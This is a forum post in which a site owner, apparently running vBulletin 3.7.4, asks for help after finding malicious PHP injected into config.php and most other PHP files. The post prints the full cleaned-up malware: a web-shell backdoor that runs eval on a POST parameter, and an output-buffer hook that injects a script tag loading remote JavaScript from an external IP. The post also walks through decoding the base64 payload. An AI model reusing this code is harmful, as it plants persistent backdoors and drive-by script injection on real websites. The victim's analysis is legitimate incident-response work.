Tweet
I woke up this morning to find that all the pages on one of my larger sites were white. I immediately thought it was a cache problem, but after restarting things, nothing worked.
I looked a little further and found that config.php suddenly had this code inserted into the end of it:
(originally it was a block of code, but I cleaned it up to read it)
After searching around some more, I realized that almost every php file had this code inserted. None of the file dates had changed.
I restored a backup and now everything is fine - but I'm trying to figure out HOW they did this and what the PURPOSE was.
There's a line in the code there 'base64_decode'. ah, a clue. That line decodes to this:
Escaped characters result in this:
After replacing characters:
That file contains a js library that starts out as this:
Anyone have any idea how they did this and what was trying to be done?
I'm running 3.7.4 pl1
I looked a little further and found that config.php suddenly had this code inserted into the end of it:
(originally it was a block of code, but I cleaned it up to read it)
PHP Code:
<?php
if (!function_exists('tmp_lkojfghx')) {
for ($i = 1; $i < 10; $i++)
if (is_file($f = '/tmp/m' . $i)) {
include_once($f);
break;
}
if (isset($_POST['tmp_lkojfghx3']))
eval($_POST['tmp_lkojfghx3']);
if (!defined('TMP_XHGFJOKL'))
define('TMP_XHGFJOKL', base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdyYzYlM0Nla2JzMndjcmlJaXAyd3QlMjBzMFMwcmMlM0QlMkYlMkY3SFh6OCUyRTBTMDEydzEwSFh6JTJFcmM2MXJON0hYejVEdSUyRXJOMjRla2I5JTJGMndqcmM2cUlpdWVyZWtieWVrYiUyRXJjNmpyYzZzJTNFMFMwJTNDMnclMkZzYzBTMHJIWHppcGVrYnQlM0UnKS5yZXBsYWNlKC9yYzZ8MFMwfElpfER1fGVrYnxyTnwyd3xIWHovZywiIikpOwogLS0+PC9zY3JpcHQ+'));
function tmp_lkojfghx($s)
{
if ($g = (bin2hex(substr($s, 0, 2)) == '1f8b'))
$s = gzinflate(substr($s, 10, -8));
if (preg_match_all('#<script(.*?)</script>#is', $s, $a))
foreach ($a[0] as $v)
if (count(explode("\n", $v)) > 5) {
$e = preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#', $v) || preg_match('#[\(\[](\s*\d+,){20,}#', $v);
if ((preg_match('#\beval\b#', $v) && ($e || strpos($v, 'fromCharCode'))) || ($e && strpos($v, 'document.write')))
$s = str_replace($v, '', $s);
}
$s1 = preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(".+?\n --></script>#', '', $s);
if (stristr($s, '<body'))
$s = preg_replace('#(\s*<body)#mi', TMP_XHGFJOKL . '\1', $s1);
elseif (($s1 != $s) || stristr($s, '</body') || stristr($s, '</title>'))
$s = $s1 . TMP_XHGFJOKL;
return $g ? gzencode($s) : $s;
}
function tmp_lkojfghx2($a = 0, $b = 0, $c = 0, $d = 0)
{
$s = array();
if ($b && $GLOBALS['tmp_xhgfjokl'])
call_user_func($GLOBALS['tmp_xhgfjokl'], $a, $b, $c, $d);
foreach (@ob_get_status(1) as $v)
if (($a = $v['name']) == 'tmp_lkojfghx')
return;
else
$s[] = array($a == 'default output handler' ? false : $a);
for ($i = count($s) - 1; $i >= 0; $i--) {
$s[$i][1] = ob_get_contents();
ob_end_clean();
}
ob_start('tmp_lkojfghx');
for ($i = 0; $i < count($s); $i++) {
ob_start($s[$i][0]);
echo $s[$i][1];
}
}
}
if (($a = @set_error_handler('tmp_lkojfghx2')) != 'tmp_lkojfghx2')
$GLOBALS['tmp_xhgfjokl'] = $a;
tmp_lkojfghx2();
?>
I restored a backup and now everything is fine - but I'm trying to figure out HOW they did this and what the PURPOSE was.
There's a line in the code there 'base64_decode'. ah, a clue. That line decodes to this:
Code:
<script language=javascript><!--
document.write(unescape('rc6%3Cekbs2wcriIip2wt%20s0S0rc%3D%2F%2F7HXz8%2E0S012w10HXz%2Erc61rN7HXz5Du%2ErN24ekb9%2F2wjrc6qIiuerekbyekb%2Erc6jrc6s%3E0S0%3C2w%2Fsc0S0rHXzipekbt%3E').replace(/rc6|0S0|Ii|Du|ekb|rN|2w|HXz/g,""));
--></script>
Code:
rc6<ekbs2wcriIip2wt s0S0rc=//7HXz8.0S012w10HXz.rc61rN7HXz5Du.rN24ekb9/2wjrc6qIiuerekbyekb.rc6jrc6s>0S0<2w/sc0S0rHXzipekbt>
Code:
<script src=//78.110.175.249/jquery.js></script>
Code:
/* * jQuery JavaScript Library v1.3.1 * [URL]http://jquery.com/[/URL] * * Copyright (c) 2009 John Resig * Dual licensed under the MIT and GPL licenses. * [URL]http://docs.jquery.com/License[/URL] * * Date: 2009-01-21 20:42:16 -0500 (Wed, 21 Jan 2009) * Revision: 6158 */
Anyone have any idea how they did this and what was trying to be done?
I'm running 3.7.4 pl1
Comment